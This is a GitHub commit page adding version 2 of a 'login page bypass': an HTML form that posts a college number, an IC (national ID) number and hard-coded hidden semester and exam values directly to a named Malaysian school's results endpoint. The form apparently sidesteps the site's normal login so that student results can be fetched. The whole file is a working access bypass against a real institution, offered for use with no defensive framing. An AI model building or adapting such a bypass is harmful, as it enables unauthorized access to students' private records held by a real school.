Skip to content

Commit

Permalink
v2 of bypass
Browse files Browse the repository at this point in the history
  • Loading branch information
hakimifr committed Dec 6, 2024
1 parent 3cc4f93 commit d31940f
Showing 1 changed file with 37 additions and 0 deletions.
37 changes: 37 additions & 0 deletions esppng-system-bypass/indexv2.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
<!DOCTYPE html>
<html lang="en">
<link rel="stylesheet" href="index.css">
<head> <!-- Fonts -->
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Quicksand&display=swap" rel="stylesheet">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>login page bypass v2 by hakimi</title>
</head>
<body>
<form class="hello" action="https://mrsmkualaklawang.edu.my/epelajar/KeputusanRedirect.asp" class="imgcontainer" method="POST">
<label for="uname"><b>ID Pengguna</b></label>
<input name="hfNoMaktab" type="text" required id="hfNoMaktab" placeholder="Nombor Maktab">
<h1></h1>
<label for="psw"><b>Katalaluan</b></label>
<input name="hfKP" id="hfKP" type="text" placeholder="Nombor IC" required>
<input name="cboSem" id="cboSem" type="hidden" value="2">
<input name="cboPep" id="cboPep" type="hidden" value="u1">
<h1></h1>

<button id="btn" class="button11 button111" type="submit">Log In</button>
<label>

</label>
</form>
</body>

<footer>
<p><a style="text-decoration: none;" href="https://github.com/Hakimi0804/Hakimi0804.github.io/tree/main/esppng-system-bypass">Source Code</a></p>
<p>By <a style="text-decoration: none;" href="https://github.com/Hakimi0804"><b>Hakimi</b></a> (4 AB)</p>
<p>v2</p>
</footer>

<script src="index.js"></script>
</html>

0 comments on commit d31940f

Please sign in to comment.